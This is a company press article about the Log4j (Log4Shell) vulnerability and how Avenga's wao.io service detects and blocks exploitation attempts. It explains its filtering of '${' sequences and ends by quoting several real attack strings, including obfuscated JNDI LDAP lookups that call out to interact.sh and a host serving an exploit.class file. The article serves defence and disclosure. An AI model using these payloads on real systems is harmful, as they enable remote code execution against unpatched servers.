Dataverse: the backbone of your Power Platform solutions
Readers can explore the advantages and use cases of Microsoft Dataverse, acquiring a better understanding of Microsoft Power Platform.
Log4j exploit: Avenga’s wao.io protects web services and their users from critical vulnerability
Log4j exploit:
Avenga's wao.io
protects web services
and their users from
critical vulnerability
The critical zero-day vulnerability in version 2.14.1 of the widespread Apache Log4j Library published on December 9 affects almost all online services worldwide. Avenga’s security experts have analyzed the possibilities for exploiting this vulnerability and implemented initial protective measures in the company’s own wao.io service. The cloud solution can be integrated like a content delivery network and is primarily used by numerous e-commerce companies to offer web stores more securely and quickly without changes to the code of their sites.
In the first 72 hours since the vulnerability became known, wao.io has blocked 1,159 malicious requests from attackers on customer sites. Two specific measures in particular are being used:
- URL and Request Header (e.g. User-Agent): Strings with the suspicious sequence ${ (identically %24 and %7b) cause the query to be blocked.
- POST Requests: For form posts (such as HTML login forms), these values are also scanned for suspicious strings and blocked if necessary.
Although the attacks all try to inject a pattern of the form , it is not enough to just look for this substring to successfully defend against all attackers. While this would be a simple first step to detect the most obvious form of the attack, the attackers are already one step ahead by making improvements to the attack during the first few days: for obfuscation, they use nested constructs to make the injection unrecognizable, e.g.
If this string is parsed, it resolves back to the original form $ {jndi :ldap..., but is no longer found by a simple search for $ {jndi :ldap.... In addition to the LDAP functions, DNS resolutions are also tried. With the security mechanisms set up by wao.io in the last few days, even such more sophisticated attacks are detected and defended against.
The risk of inadvertently blocking legitimate requests with these characters (false positives) is very low. Nevertheless, experts continuously analyze the log files and ensure that wao.io customers can continue to operate their websites not only securely, but also reliably and without downtime.
“We will continue to monitor the activity around the log4shell gap and adapt the protection in wao.io accordingly,” says Roland Guelle, VP Technology at Avenga. He continued, “It’s important to understand that wao.io alone is still not enough protection. There are also other ways to exploit the gap that we cannot prevent with our approach. Users should therefore definitely take steps on their end to replace the malicious software version, or prevent the execution of the problematic code through appropriate settings.”
The team behind wao.io continuously analyzes the behavior of attackers in order to be able to react immediately to modified attacks. This has already revealed numerous cases of combinations of different attack patterns: Other types of attacks (e.g. code or SQL injections) are also being tested, and the tests are now additionally being extended to include the newly disclosed vulnerability. This makes it clear that comprehensive website protection is absolutely essential, regardless of the current security vulnerability and beyond. Companies should also rely on their own experts with appropriate monitoring for this purpose, as well as additionally choosing CDN providers that include a protective function against these and other attack vectors. It is also advisable to take out appropriate insurance in case the countermeasures fail or come too late.
Examples of attack requests that have come to the attention of Avenga’s security experts include
User-Agent:
${ jndi:ldap ://c6rlj0ovc25q3hjjf3tgcg5iubyyyyypw.interact.sh/a}${ jndi:ldap ://c6rlj0ovc25q3hjjf3tgcg5iubyyyyypw.interact.sh/a}Request-Header via:
${ jndi:ldap ://n714d2e7e.aHR0cDovL3JhdG9yLXN0YWdlLm5ldHpjbHViLm5ldDo4MA==.dnsprobe.${::-r}edteam.tf/exploit.class}Request-Header x-forwarded-for:
${ jndi :${lower:l} ${lower:d} ${lower:a} ${lower:p}://${hostName}.0000nlm6c0j53v2s668g61398133715me.interact.sh}Path:
/?test=${ ${lower:j} ${upper:n} ${lower:d} ${upper:i} :${lower:r} m${lower:i}} ://interactsh-url/poc}
How to make your software transition successful
Discover what is at the heart of a good software transition plan and what the transition journey consists of.
Viva Connections: a centralized hub for communication
Create a curated workplace experience that simplifies a digital workplace. Viva Connections is a centralized solution within the Microsoft 365 ecosystem.
The ultimate guide to Microsoft 365 document management
Explore the basics of document management in Microsoft 365. Examine the possibilities of integration OneDrive for Business, SharePoint, and Teams.
Intranet useful for all employees: evaluation criteria
Empower your employees with modern intranet solutions. Discover essential criteria for maximizing employee engagement, productivity, and collaboration.
Volunteer of the year: a shining example of dedication and patriotism
In our Avenga team, we have many dedicated volunteers, and today, we want to tell you the story of Nazar Bigun, a Senior NodeJS Engineer, who was chosen by his teammates at Avenga Ukraine as the Volunteer of the Year.
Cloud strategy: a 2024 guide
Explore a guide on how to set up a cohesive cloud strategy. Learn more about the intricacies of cloud adoption.
KKCG Completes Acquisition of Avenga from Oaktree and Cornerstone
Discover the latest news as KKCG completes the acquisition of Avenga from Oaktree and Cornerstone.
or
Ready to innovate your business?
We are! Let’s kick-off our journey to success!